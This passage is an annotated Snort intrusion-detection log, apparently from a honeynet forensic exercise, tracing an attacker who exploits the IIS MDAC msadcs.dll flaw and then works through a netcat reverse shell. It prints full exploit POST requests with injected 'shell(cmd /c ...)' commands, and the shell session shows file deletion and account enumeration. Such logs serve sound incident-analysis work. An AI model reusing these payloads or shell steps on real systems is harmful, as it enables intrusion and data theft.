.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .C
.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.s.y.s
.t.e.m.\.m.s.a.d.c.\.p.d.u.m.p...e.x.e. .>.>. .c.:.\.y.a.y...t.x
.t.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s
. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e
.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b
.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:42.700098 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:49529 IpLen:20 DgmLen:203 DF
***AP*** Seq: 0x2CBEB914 Ack: 0x9E43FB5A Win: 0x21F7 TcpLen: 20
c:...The filename, directory name, or volume label syntax is inc
orrect.....C:\Program Files\Common Files\system\msadc>..C:\Progr
am Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:43.701287 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:50297 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CBEB9B7 Ack: 0x9E43FB5F Win: 0x21F2 TcpLen: 20
cd\....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:44.602862 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:50809 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEB9C8 Ack: 0x9E43FB64 Win: 0x21ED TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# From remote shell: CDs to 'c:\' and lists files. There is yay.txt
[**] netcat session 6969 [**]
02/04-05:44:45.158335 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51065 IpLen:20 DgmLen:746 DF
***AP*** Seq: 0x2CBEBA90 Ack: 0x9E43FB64 Win: 0x21ED TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 06:26a
7 fun..12/07/00 03:30p InetPub..
12/07/00 03:12p Multimedia Files..12/26/0
0 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p
Program Files..12/21/00 08:59p TE
MP..02/04/01 06:42a WINNT..12/26/00 07:0
9p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,643,529 bytes
.. 1,690,861,056 bytes free....C:\>..C:
\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries another *nix command from remote shell. Uses 'rm' instead of 'del'
[**] netcat session 6969 [**]
02/04-05:44:51.365858 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52601 IpLen:20 DgmLen:166 DF
***AP*** Seq: 0x2CBEBD52 Ack: 0x9E43FB6B Win: 0x21E6 TcpLen: 20
rm ....The name specified is not recognized as an..internal or e
xternal command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# More cleanup, deletes file 'fun' using remote shell
[**] netcat session 6969 [**]
02/04-05:44:54.366817 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53881 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x2CBEBDD0 Ack: 0x9E43FB74 Win: 0x21DD TcpLen: 20
del fun....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:55.271762 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54393 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEBDE5 Ack: 0x9E43FB79 Win: 0x21D8 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:44:55.756325 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54649 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEBEAD Ack: 0x9E43FB79 Win: 0x21D8 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:00.325593 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56185 IpLen:20 DgmLen:110 DF
***AP*** Seq: 0x2CBEC143 Ack: 0x9E43FB87 Win: 0x21CA TcpLen: 20
cd exploites..The system cannot find the path specified.....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:01.227368 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56697 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEC189 Ack: 0x9E43FB8C Win: 0x21C5 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:01.783290 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56953 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEC251 Ack: 0x9E43FB8C Win: 0x21C5 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# exploring... Uses remote shell to 'cd' to exploits directory
[**] netcat session 6969 [**]
02/04-05:45:03.630418 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:57977 IpLen:20 DgmLen:81 DF
***AP*** Seq: 0x2CBEC4E7 Ack: 0x9E43FB99 Win: 0x21B8 TcpLen: 20
cd exploits....C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:04.385185 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:58489 IpLen:20 DgmLen:146 DF
***AP*** Seq: 0x2CBEC510 Ack: 0x9E43FB9E Win: 0x21B3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:04.884912 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59001 IpLen:20 DgmLen:396 DF
***AP*** Seq: 0x2CBEC57A Ack: 0x9E43FB9E Win: 0x21B3 TcpLen: 20
12/26/00 07:36p ...12/26/00 07:36p
....12/26/00 07:36p micr
osoft..12/26/00 07:35p newfiles..12/26/00
07:24p unix.. 5 File(s)
0 bytes.. 1,690,861,056 byte
s free....C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.089824 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60793 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBEC6DE Ack: 0x9E43FBAE Win: 0x21A3 TcpLen: 20
cd microsoft..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.414143 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61049 IpLen:20 DgmLen:88 DF
***AP*** Seq: 0x2CBEC6EC Ack: 0x9E43FBB1 Win: 0x21A0 TcpLen: 20
..C:\exploits\microsoft>..C:\exploits\microsoft>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.883022 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61305 IpLen:20 DgmLen:541 DF
***AP*** Seq: 0x2CBEC71C Ack: 0x9E43FBB1 Win: 0x21A0 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\microsoft....12/26/00 07
:36p ...12/26/00 07:36p
.....11/05/97 09:46a 87,312 95sscrk.zip..08
/15/00 02:06p 734 ac.zip..08/12/98 09:46a
9,417 anger.tar.gz.. 5 File(s)
97,463 bytes.. 1,690,861,056 bytes f
ree....C:\exploits\microsoft>..C:\exploits\microsoft>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:22.658346 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:62841 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBEC911 Ack: 0x9E43FBB8 Win: 0x2199 TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:25.616190 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64121 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0x2CBEC934 Ack: 0x9E43FBC5 Win: 0x218C TcpLen: 20
cd newfiles....C:\exploits\newfiles>..C:\exploits\newfiles>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:26.417624 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64633 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEC96F Ack: 0x9E43FBCA Win: 0x2187 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\newfiles....12/26/00 07:
35p ...12/26/00 07:35p
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:26.906565 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64889 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x2CBECA37 Ack: 0x9E43FBCA Win: 0x2187 TcpLen: 20
2 File(s) 0 bytes..
1,690,861,056 bytes free....C:\exploits\newfiles>..C:\e
xploits\newfiles>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:29.268152 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:122 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBECAC8 Ack: 0x9E43FBD1 Win: 0x2180 TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:30.670116 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:890 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x2CBECAEB Ack: 0x9E43FBDA Win: 0x2177 TcpLen: 20
cd unix....C:\exploits\unix>..C:\exploits\unix>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:31.521418 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:1402 IpLen:20 DgmLen:151 DF
***AP*** Seq: 0x2CBECB1A Ack: 0x9E43FBDF Win: 0x2172 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\unix....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:32.010521 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:1658 IpLen:20 DgmLen:581 DF
***AP*** Seq: 0x2CBECB89 Ack: 0x9E43FBDF Win: 0x2172 TcpLen: 20
12/26/00 07:24p ...12/26/00 07:24p
....12/26/00 07:25p suno
s-exploits..12/26/00 07:24p tcp-exploits.
.12/26/00 07:24p trojans..12/26/00 07:16
p udp-exploits..12/26/00 07:15p ultrix-exploits..12/26/00 07:15p
xwin-exploits.. 8 File(s) 0 byte
s.. 1,690,861,056 bytes free....C:\expl
oits\unix>..C:\exploits\unix>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:37.480132 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2682 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBECDA6 Ack: 0x9E43FBE7 Win: 0x216A TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:37.830864 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2938 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBECDC9 Ack: 0x9E43FBEB Win: 0x2166 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits....12/26/00 07:36p
...12/26/00 07:36p ....1
2/26/00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:38.338194 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3194 IpLen:20 DgmLen:302 DF
***AP*** Seq: 0x2CBECE91 Ack: 0x9E43FBEB Win: 0x2166 TcpLen: 20
07:36p microsoft..12/26/00 07:35p
newfiles..12/26/00 07:24p
unix.. 5 File(s) 0 bytes..
1,690,861,056 bytes free....C:\exploits>..C:\exp
loits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After exploring the subdirectories, he/she 'cd's back to 'c:\'
[**] netcat session 6969 [**]
02/04-05:45:40.584634 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4218 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0x2CBECF97 Ack: 0x9E43FBF4 Win: 0x215D TcpLen: 20
cd ......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:40.935399 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4474 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBECFAA Ack: 0x9E43FBF7 Win: 0x215A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:41.432721 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4730 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED072 Ack: 0x9E43FBF7 Win: 0x215A TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'pdump.exe' again and append the output to file 'c:\yay.txt'
!@# He/She might have noticed the 0 file size for yay.txt in the directory listing.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:45:55.240124 213.116.251.162:1901 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12216 IpLen:20 DgmLen:753 DF
***AP*** Seq: 0xA114BDBA Ack: 0x2CC17E0C Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 559..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 350..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.d.u.m.p...e.x.e. .>.>. .c.:.\.y.a.y...t.x.t.".).|.'.......d.r.i
.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*..
.m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\
.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!W
ORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:58.581282 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7802 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBED308 Ack: 0x9E43FBFC Win: 0x2155 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:59.165524 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8058 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED3D0 Ack: 0x9E43FBFC Win: 0x2155 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:44a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:01.285062 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9082 IpLen:20 DgmLen:165 DF
***AP*** Seq: 0x2CBED666 Ack: 0x9E43FC02 Win: 0x214F TcpLen: 20
dir'..The name specified is not recognized as an..internal or ex
ternal command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:03.098674 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9594 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBED6E3 Ack: 0x9E43FC07 Win: 0x214A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:03.659599 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9850 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED7AB Ack: 0x9E43FC07 Win: 0x214A TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:44a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After a couple running dir a couple more times and seeing the same result (0 file size), he/she tries to read the file using 'cat'.
!@# This fails as this still isn't a *nix box
[**] netcat session 6969 [**]
02/04-05:46:06.402691 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:11130 IpLen:20 DgmLen:168 DF
***AP*** Seq: 0x2CBEDA41 Ack: 0x9E43FC10 Win: 0x2141 TcpLen: 20
cat yay..The name specified is not recognized as an..internal or
external command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:08.806154 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12666 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEDAC1 Ack: 0x9E43FC1B Win: 0x2136 TcpLen: 20
type yay...The system cannot find the file specified.....C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# tries again using the 'type' command.
!@# File yay.txt is empty
[**] netcat session 6969 [**]
02/04-05:46:11.710118 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:14202 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0x2CBEDB04 Ack: 0x9E43FC29 Win: 0x2128 TcpLen: 20
type yay.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:20.322907 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15482 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBEDB1E Ack: 0x9E43FC36 Win: 0x211B TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Using remote shell (web server priviledges), he/she tries to run 'net session' command, likely to check for netbios shares in use.
!@# This fails due to lack of priviledges.
[**] netcat session 6969 [**]
02/04-05:46:20.787688 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15738 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEDB2B Ack: 0x9E43FC36 Win: 0x211B TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Using remote shell, he/she runs 'net users' command for a listing of local accounts.
[**] netcat session 6969 [**]
02/04-05:46:24.733232 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:17018 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBEDB6E Ack: 0x9E43FC41 Win: 0x2110 TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# It works
[**] netcat session 6969 [**]
02/04-05:46:25.183904 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:17274 IpLen:20 DgmLen:315 DF
***AP*** Seq: 0x2CBEDB79 Ack: 0x9E43FC41 Win: 0x2110 TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulenerability (system privs.) to run 'net session' command and redirect output to file 'yay2.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:48.722495 213.116.251.162:1922 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12462 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0xA2D450B8 Ack: 0x2CC3394E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 557..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
